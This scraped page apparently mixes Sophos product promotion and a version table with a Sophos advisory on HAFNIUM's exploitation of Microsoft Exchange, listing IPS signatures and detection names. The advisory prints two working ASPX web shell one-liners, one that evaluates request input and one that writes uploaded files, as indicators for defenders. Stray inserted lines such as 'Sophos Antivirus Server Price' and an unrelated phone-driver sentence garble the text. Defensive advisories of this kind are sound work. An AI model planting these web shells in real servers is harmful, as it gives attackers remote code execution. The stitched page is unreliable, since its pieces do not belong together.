- Sophos Home for PCs and Macs Protect all the computers in your home with the free Sophos Home. The same antivirus, malware protection, and web filtering technology trusted by hundreds of thousands of businesses is now yours to take home. Stop malware, viruses, ransomware, and malicious apps.
- Real-Time PC Antivirus Spots telltale virus behaviors and uses the extensive SophosLabs databases to constantly protect your PC from viruses, malware, trojans, worms, bots, unwanted applications, ransomware, and more.
Components
An industry first, Synchronized Security shares data between your Sophos servers and firewalls, making your protection faster and smarter. Identify unclassified apps and processes that are using bandwidth Block worm-like lateral movement, isolating infected machines with one click Protect servers from other compromised machines on the network.
Sophos Central Server Anti-Virus Windows Server 2008 R2 and later | 10.8.10.3 January 2021 | 10.8.9 update October 2020 | 10.8.9 October 2020 | 10.8.8 July 2020 | 10.8.7 May 2020 | 10.8.6 update February 2020 | 10.8.6 January 2020 |
---|---|---|---|---|---|---|---|
Sophos Anti-Virus | 10.8.10.810 | 10.8.9.610 | 10.8.9.292 | 10.8.8.337 | 10.8.7.1000 | 10.8.6.215 | 10.8.6.215 |
Sophos Endpoint Firewall Management | 1.2.0.17 | 1.2.0.17 | 1.2.0.17 | 1.2.0.17 | 1.2.0.17 | 1.1.0.0 | 1.1.0.0 |
Threat detection engine | 3.80.1 | 3.79.0 | 3.79.0 | 3.79.0 | 3.78.7 | 3.78.5 | 3.77.1 |
Server release notes
For changes, resolved issues, and known issues for the core components, see the Sophos Server Core Agent release notes.
For changes to Intercept X Advanced for Server with EDR, see the Sophos Central Server Intercept X release notes.
For improvements and new features in Sophos Central, see What's new in Sophos Central.
Updates that require a restart
Occasionally an update requires a restart. Sophos never forces this restart and there is no impact on protection or threat detection updates during the period before the restart.
We recommend that you schedule a restart during your next maintenance window to ensure that you are running the latest version.
Four new zero-day vulnerabilities affecting Microsoft Exchange are being actively exploited in the wild by HAFNIUM, a threat actor believed to be a nation state.
Anyone running on-premises Exchange Servers should patch them without delay, and search their networks for indicators of attack.
Sophos protections against HAFNIUM
Sophos MTR, network and endpoint security customers benefit from multiple protections against the exploitation of the new vulnerabilities.
Sophos MTR
The Sophos MTR team has been monitoring our customer environments for behaviors associated with these vulnerabilities since their announcement. If we identify any malicious activity related to these vulnerabilities, we will create a case and be in touch with you directly.
Sophos Firewall
IPS signatures for customers running SFOS and XFOS:
Sophos Antivirus
CVE | SID |
CVE-2021-26855 | 57241, 57242, 57243, 57244, 2305106, 2305107 |
CVE-2021-26857 | 57233, 57234 |
CVE-2021-26858 | 57245, 57246 |
CVE-2021-27065 | 57245, 57246 |
Drivers research in motion mobile phones & portable devices. These signatures are also present on the Endpoint IPS in Intercept X Advanced.
IPS signatures for customers running Sophos UTM:
CVE | SID |
CVE-2021-26855 | 57241, 57242, 57243, 57244 |
CVE-2021-26857 | 57233, 57234 |
CVE-2021-26858 | 57245, 57246 |
CVE-2021-27065 | 57245, 57246 |
If you see these detection names on your networks you should investigate further and remediate.
Sophos Intercept X Advanced and Sophos Antivirus (SAV)
Customers can monitor the following AV signatures to identify potential HAFNIUM attacks:
Web shell related
- Troj/WebShel-L
- Troj/WebShel-M
- Troj/WebShel-N
- Troj/ASPDoor-T
- Troj/ASPDoor-U
- Troj/ASPDoor-V
- Troj/AspScChk-A
- Troj/Bckdr-RXD
- Troj/WebShel-O
- Troj/WebShel-P
Other payloads
- Mal/Chopper-A
- Mal/Chopper-B
- ATK/Pivot-B
- AMSI/PowerCat-A (Powercat)
- AMSI/PSRev-A (Invoke-PowerShellTcpOneLine reverse shell)
Due to the dynamic nature of the web shells, the shells are blocked but need to be removed manually. If you see these detection names on your networks you should investigate further and remediate.
We have also blocked relevant C2 IP destinations, where it was safe to do so.
In addition, the “lsass dump” stages of the attack are blocked by the credential protection (CredGuard) included in all Intercept X Advanced subscriptions.
Sophos Antivirus Server
Sophos EDR
Sophos EDR customers can leverage pre-prepared queries to identify potential web shells for investigation:
When reviewing the potential web shells identified by the queries, the web shell will typically appear inside an Exchange Offline Address Book (OAB) configuration file, in the ExternalUrl field. E.g.
Sophos Antivirus Server Price
ExternalUrl : http://f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“key-here”],”unsafe”);}</script>
ExternalUrl: http://g/<script Language=”c#” runat=”server”>void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(“error.aspx”));}}</script>
Identifying signs of compromise
The Sophos MTR team has published a step-by-step guide on how to search your network for signs of compromise.
DearCry ransomware
The actors behind DearCry ransomware are using the same vulnerabilities as the Hafnium group in their attacks. Sophos Intercept X detects and blocks Dearcry via:
- Troj/Ransom-GFE
- CryptoGuard
Editor note: Post updated with addition of IPS signatures for Sophos UTM and additional detections. 2021-03-10 08:35 UTC
Editor note: Post updated with additional anti-malware signatures for Intercept X and Sophos Antvirus (SAV) 2021-03-11 14:30 UTC
Editor note: Post updated to advise that signatures are now present on the Endpoint IPS, and the addition of two further AV signatures 2021-03-12 09:10 UTC
Editor note: Post updated with DearCry ransomware detections 2021-03-12 16:30 UTC